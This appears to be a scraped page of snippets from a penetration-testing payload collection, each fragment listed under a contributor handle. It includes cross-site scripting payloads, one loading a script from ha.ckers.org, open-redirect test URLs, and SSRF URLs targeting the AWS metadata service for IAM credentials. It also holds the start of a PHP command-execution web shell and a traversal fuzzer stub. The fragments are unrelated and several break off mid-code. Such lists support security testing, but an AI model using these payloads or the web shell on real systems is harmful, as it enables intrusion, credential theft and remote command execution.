OblivionDev

#!/usr/bin/env ruby
require 'wwmd'
require 'example_mixins'
include WWMD
puts "Traversal Fuzzer made by Outlasted\n Greetz to .:TeaMp0isoN:."
opts = { :base_url => "http://www.example.com" }
page = Page.new(opts)
spider = page.spider ;
spider.set_ignore([ /logout/i, /login/i ]) ;
while (url = spider.next) ;

stevenswafford

"          _                      _          "
"   _     /||       .   .        ||\     _   "
"  ( }    \||D    '   '     '   C||/    { %  "
" | /\__,=_[_]   '  .   . '       [_]_=,__/\ |"
" |_\_  |----|                    |----|  _/_|"
" |  |/ |    |                    |    | \|  |"
" |  /_ |    |                    |    | _\  |"

	It is all fun and games until someone gets hacked!

1N3

http://google.com
//google.com
\\google.com
\/google.com
\/\/google.com
/\google.com
/\/\google.com
|/google.com
/%09/google.com
/google.com

rvrsh3ll

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

BuffaloWill

## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]

## AWS 
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

sapran

" onfocus="alert(1)" name="bounty
(Append #bounty to the URL and enjoy your zero interaction XSS )

<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//

# Internet Explorer, Edge
<svg><script>alert(1)<p>

# Firefox

1N3

#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com 
#

OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'

hsuh

url - https://aws.amazon.com/blogs/security/a-safer-way-to-distribute-aws-credentials-to-ec2/

Finding hard-coded credentials in your code
Hopefully you’re excited about deploying credentials to EC2 that are automatically rotated.  Now that you’re using Roles, a good security practice would be to go through your code and remove any references to AKID/Secret.  We suggest running the following regular expressions against your code base:

Search for access key IDs: (?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9]).  In English, this regular expression says: Find me 20-character, uppercase, alphanumeric strings that don’t have any uppercase, alphanumeric characters immediately before or after.
Search for secret access keys: (?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=]).  In English, this regular expression says: Find me 40-character, base-64 strings that don’t have any base 64 characters immediately before or after.
If grep is your preferred tool, run a recursive, Perl-compatible search using the following commands

jhaddix

.
..
........
@
*
*.*
*.*.*
🐎

joswr1ght

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {